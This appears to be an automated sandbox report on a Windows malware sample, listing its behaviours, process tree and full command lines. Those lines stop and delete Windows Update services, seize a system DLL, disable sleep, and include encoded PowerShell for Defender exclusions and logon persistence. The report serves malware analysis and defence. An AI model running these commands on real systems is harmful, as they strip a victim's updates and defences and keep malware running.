80930071626aa46a7ef7ebd2b285d203ebe554ea11d0799bf0395f6cb823a00a

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
30-08-2022 13:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a85d7d886197d00f694f2ad8e7aa5b32.exe
Size

5.5MB
MD5

a85d7d886197d00f694f2ad8e7aa5b32
SHA1

af1424b1d292099d091aa4461ae6502412866176
SHA256

80930071626aa46a7ef7ebd2b285d203ebe554ea11d0799bf0395f6cb823a00a
SHA512

32a3f3d9b43ed92bc4514ae63e2b607e3f82469ac9cedbe49db01baf690b75545d9e54b894addd442604b0e231910d796af9512f654216630c39b4e95b6143fe
SSDEEP

98304:juWAuvKS7/fn+k45KJq7UX39Yn51g2MOw29TxmWZ3ElF68JlrcbYrCFmmO+:jkS7/fn25gH9oTw2RxxJElIglDrYt

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

Executes dropped EXE 4 IoCs

Processes:

76587423657325823.exeSIJPFdhsui3sdfSF.exeWindowsAutHostsvchost.exe

pid process

3688 76587423657325823.exe
4936 SIJPFdhsui3sdfSF.exe
139256 WindowsAutHost
3208 svchost.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exetakeown.exetakeown.exeicacls.exe

pid process

1516 icacls.exe
1128 takeown.exe
139040 takeown.exe
139068 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
3688	76587423657325823.exe
4936	SIJPFdhsui3sdfSF.exe
139256	WindowsAutHost
3208	svchost.exe

pid	process
1516	icacls.exe
1128	takeown.exe
139040	takeown.exe
139068	icacls.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

a85d7d886197d00f694f2ad8e7aa5b32.exeSIJPFdhsui3sdfSF.exeWindowsAutHost

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	a85d7d886197d00f694f2ad8e7aa5b32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	SIJPFdhsui3sdfSF.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WindowsAutHost

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exetakeown.exe

pid process

139040 takeown.exe
139068 icacls.exe
1516 icacls.exe
1128 takeown.exe

pid	process
139040	takeown.exe
139068	icacls.exe
1516	icacls.exe
1128	takeown.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

76587423657325823.exeWindowsAutHost

description	pid	process	target process
PID 3688 set thread context of 138432	3688	76587423657325823.exe	AppLaunch.exe
PID 139256 set thread context of 3208	139256	WindowsAutHost	svchost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

138828 sc.exe
1660 sc.exe
138684 sc.exe
138764 sc.exe
2604 sc.exe
4196 sc.exe
2180 sc.exe
1644 sc.exe
138868 sc.exe
138892 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
138828	sc.exe
1660	sc.exe
138684	sc.exe
138764	sc.exe
2604	sc.exe
4196	sc.exe
2180	sc.exe
1644	sc.exe
138868	sc.exe
138892	sc.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
952	reg.exe
2864	reg.exe
138960	reg.exe
3852	reg.exe
3636	reg.exe
4084	reg.exe
138916	reg.exe
139004	reg.exe
1744	reg.exe
372	reg.exe
4572	reg.exe
138984	reg.exe
139024	reg.exe
1680	reg.exe
138444	reg.exe
4496	reg.exe
5036	reg.exe
3816	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeSIJPFdhsui3sdfSF.exepowershell.exepowershell.exesvchost.exe

pid	process
12888	powershell.exe
12888	powershell.exe
12888	powershell.exe
12888	powershell.exe
138604	powershell.exe
138604	powershell.exe
4936	SIJPFdhsui3sdfSF.exe
4660	powershell.exe
4660	powershell.exe
5044	powershell.exe
5044	powershell.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

660

pid	process
660

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	12888	powershell.exe
Token: SeDebugPrivilege	138604	powershell.exe
Token: SeShutdownPrivilege	138692	powercfg.exe
Token: SeCreatePagefilePrivilege	138692	powercfg.exe
Token: SeShutdownPrivilege	138752	powercfg.exe
Token: SeCreatePagefilePrivilege	138752	powercfg.exe
Token: SeShutdownPrivilege	138800	powercfg.exe
Token: SeCreatePagefilePrivilege	138800	powercfg.exe
Token: SeShutdownPrivilege	138816	powercfg.exe
Token: SeCreatePagefilePrivilege	138816	powercfg.exe
Token: SeIncreaseQuotaPrivilege	138604	powershell.exe
Token: SeSecurityPrivilege	138604	powershell.exe
Token: SeTakeOwnershipPrivilege	138604	powershell.exe
Token: SeLoadDriverPrivilege	138604	powershell.exe
Token: SeSystemProfilePrivilege	138604	powershell.exe
Token: SeSystemtimePrivilege	138604	powershell.exe
Token: SeProfSingleProcessPrivilege	138604	powershell.exe
Token: SeIncBasePriorityPrivilege	138604	powershell.exe
Token: SeCreatePagefilePrivilege	138604	powershell.exe
Token: SeBackupPrivilege	138604	powershell.exe
Token: SeRestorePrivilege	138604	powershell.exe
Token: SeShutdownPrivilege	138604	powershell.exe
Token: SeDebugPrivilege	138604	powershell.exe
Token: SeSystemEnvironmentPrivilege	138604	powershell.exe
Token: SeRemoteShutdownPrivilege	138604	powershell.exe
Token: SeUndockPrivilege	138604	powershell.exe
Token: SeManageVolumePrivilege	138604	powershell.exe
Token: 33	138604	powershell.exe
Token: 34	138604	powershell.exe
Token: 35	138604	powershell.exe
Token: 36	138604	powershell.exe
Token: SeIncreaseQuotaPrivilege	138604	powershell.exe
Token: SeSecurityPrivilege	138604	powershell.exe
Token: SeTakeOwnershipPrivilege	138604	powershell.exe
Token: SeLoadDriverPrivilege	138604	powershell.exe
Token: SeSystemProfilePrivilege	138604	powershell.exe
Token: SeSystemtimePrivilege	138604	powershell.exe
Token: SeProfSingleProcessPrivilege	138604	powershell.exe
Token: SeIncBasePriorityPrivilege	138604	powershell.exe
Token: SeCreatePagefilePrivilege	138604	powershell.exe
Token: SeBackupPrivilege	138604	powershell.exe
Token: SeRestorePrivilege	138604	powershell.exe
Token: SeShutdownPrivilege	138604	powershell.exe
Token: SeDebugPrivilege	138604	powershell.exe
Token: SeSystemEnvironmentPrivilege	138604	powershell.exe
Token: SeRemoteShutdownPrivilege	138604	powershell.exe
Token: SeUndockPrivilege	138604	powershell.exe
Token: SeManageVolumePrivilege	138604	powershell.exe
Token: 33	138604	powershell.exe
Token: 34	138604	powershell.exe
Token: 35	138604	powershell.exe
Token: 36	138604	powershell.exe
Token: SeIncreaseQuotaPrivilege	138604	powershell.exe
Token: SeSecurityPrivilege	138604	powershell.exe
Token: SeTakeOwnershipPrivilege	138604	powershell.exe
Token: SeLoadDriverPrivilege	138604	powershell.exe
Token: SeSystemProfilePrivilege	138604	powershell.exe
Token: SeSystemtimePrivilege	138604	powershell.exe
Token: SeProfSingleProcessPrivilege	138604	powershell.exe
Token: SeIncBasePriorityPrivilege	138604	powershell.exe
Token: SeCreatePagefilePrivilege	138604	powershell.exe
Token: SeBackupPrivilege	138604	powershell.exe
Token: SeRestorePrivilege	138604	powershell.exe
Token: SeShutdownPrivilege	138604	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

svchost.exe

pid	process
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

svchost.exe

pid	process
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe
3208	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a85d7d886197d00f694f2ad8e7aa5b32.exeSIJPFdhsui3sdfSF.exe76587423657325823.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4336 wrote to memory of 3688	4336	a85d7d886197d00f694f2ad8e7aa5b32.exe	76587423657325823.exe
PID 4336 wrote to memory of 3688	4336	a85d7d886197d00f694f2ad8e7aa5b32.exe	76587423657325823.exe
PID 4336 wrote to memory of 3688	4336	a85d7d886197d00f694f2ad8e7aa5b32.exe	76587423657325823.exe
PID 4336 wrote to memory of 4936	4336	a85d7d886197d00f694f2ad8e7aa5b32.exe	SIJPFdhsui3sdfSF.exe
PID 4336 wrote to memory of 4936	4336	a85d7d886197d00f694f2ad8e7aa5b32.exe	SIJPFdhsui3sdfSF.exe
PID 4936 wrote to memory of 12888	4936	SIJPFdhsui3sdfSF.exe	powershell.exe
PID 4936 wrote to memory of 12888	4936	SIJPFdhsui3sdfSF.exe	powershell.exe
PID 3688 wrote to memory of 138432	3688	76587423657325823.exe	AppLaunch.exe
PID 3688 wrote to memory of 138432	3688	76587423657325823.exe	AppLaunch.exe
PID 3688 wrote to memory of 138432	3688	76587423657325823.exe	AppLaunch.exe
PID 3688 wrote to memory of 138432	3688	76587423657325823.exe	AppLaunch.exe
PID 3688 wrote to memory of 138432	3688	76587423657325823.exe	AppLaunch.exe
PID 4936 wrote to memory of 138508	4936	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 4936 wrote to memory of 138508	4936	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 4936 wrote to memory of 138548	4936	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 4936 wrote to memory of 138548	4936	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 4936 wrote to memory of 138604	4936	SIJPFdhsui3sdfSF.exe	powershell.exe
PID 4936 wrote to memory of 138604	4936	SIJPFdhsui3sdfSF.exe	powershell.exe
PID 138508 wrote to memory of 138684	138508	cmd.exe	sc.exe
PID 138508 wrote to memory of 138684	138508	cmd.exe	sc.exe
PID 138548 wrote to memory of 138692	138548	cmd.exe	powercfg.exe
PID 138548 wrote to memory of 138692	138548	cmd.exe	powercfg.exe
PID 138548 wrote to memory of 138752	138548	cmd.exe	powercfg.exe
PID 138548 wrote to memory of 138752	138548	cmd.exe	powercfg.exe
PID 138508 wrote to memory of 138764	138508	cmd.exe	sc.exe
PID 138508 wrote to memory of 138764	138508	cmd.exe	sc.exe
PID 138548 wrote to memory of 138800	138548	cmd.exe	powercfg.exe
PID 138548 wrote to memory of 138800	138548	cmd.exe	powercfg.exe
PID 138548 wrote to memory of 138816	138548	cmd.exe	powercfg.exe
PID 138548 wrote to memory of 138816	138548	cmd.exe	powercfg.exe
PID 138508 wrote to memory of 138828	138508	cmd.exe	sc.exe
PID 138508 wrote to memory of 138828	138508	cmd.exe	sc.exe
PID 138508 wrote to memory of 138868	138508	cmd.exe	sc.exe
PID 138508 wrote to memory of 138868	138508	cmd.exe	sc.exe
PID 138508 wrote to memory of 138892	138508	cmd.exe	sc.exe
PID 138508 wrote to memory of 138892	138508	cmd.exe	sc.exe
PID 138508 wrote to memory of 138916	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 138916	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 138960	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 138960	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 138984	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 138984	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 139004	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 139004	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 139024	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 139024	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 139040	138508	cmd.exe	takeown.exe
PID 138508 wrote to memory of 139040	138508	cmd.exe	takeown.exe
PID 138508 wrote to memory of 139068	138508	cmd.exe	icacls.exe
PID 138508 wrote to memory of 139068	138508	cmd.exe	icacls.exe
PID 4936 wrote to memory of 139104	4936	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 4936 wrote to memory of 139104	4936	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 4936 wrote to memory of 139144	4936	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 4936 wrote to memory of 139144	4936	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 139144 wrote to memory of 139212	139144	cmd.exe	choice.exe
PID 139144 wrote to memory of 139212	139144	cmd.exe	choice.exe
PID 139104 wrote to memory of 139220	139104	cmd.exe	schtasks.exe
PID 139104 wrote to memory of 139220	139104	cmd.exe	schtasks.exe
PID 138508 wrote to memory of 138444	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 138444	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 1680	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 1680	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 1744	138508	cmd.exe	reg.exe
PID 138508 wrote to memory of 1744	138508	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\a85d7d886197d00f694f2ad8e7aa5b32.exe
"C:\Users\Admin\AppData\Local\Temp\a85d7d886197d00f694f2ad8e7aa5b32.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4336

C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe
"C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3688

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:138432

C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe
"C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbQB2ACMAPgAgAEAAKAAgADwAIwBpAGIAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEAZQBnACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAHYAawB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAegAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:12888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:138508

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:138684

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:138764

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:138828

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:138868

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:138892

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:138916

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:138984

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:139004

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:139024

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:139040

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:139068

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:138960

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1468

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1292

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:2600

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:2124

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:2328

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1364

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:4604

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3852

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1744

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1680

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:138444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAbQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHcAcwBTAGUAcgB2AGkAYwBlAHMAXABXAGkAbgBkAG8AdwBzAEEAdQB0AEgAbwBzAHQAIgAnACkAIAA8ACMAcwBxAGwAaAAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuACkAIAA8ACMAZgBqAG0AcwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGIAdwAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcAVwBpAG4AZABvAHcAcwBBAHUAdABIAG8AcwB0ACcAIAAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBwAHYAIwA+ADsA"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:138604

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:138548

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:138692

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:138752

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:138800

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:138816

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsAutHost"
3⤵
- Suspicious use of WriteProcessMemory
PID:139104

C:\Windows\system32\schtasks.exe
schtasks /run /tn "WindowsAutHost"
4⤵
PID:139220

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:139144

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:139212

C:\Users\Admin\AppData\Roaming\WindowsServices\WindowsAutHost
C:\Users\Admin\AppData\Roaming\WindowsServices\WindowsAutHost
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
PID:139256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
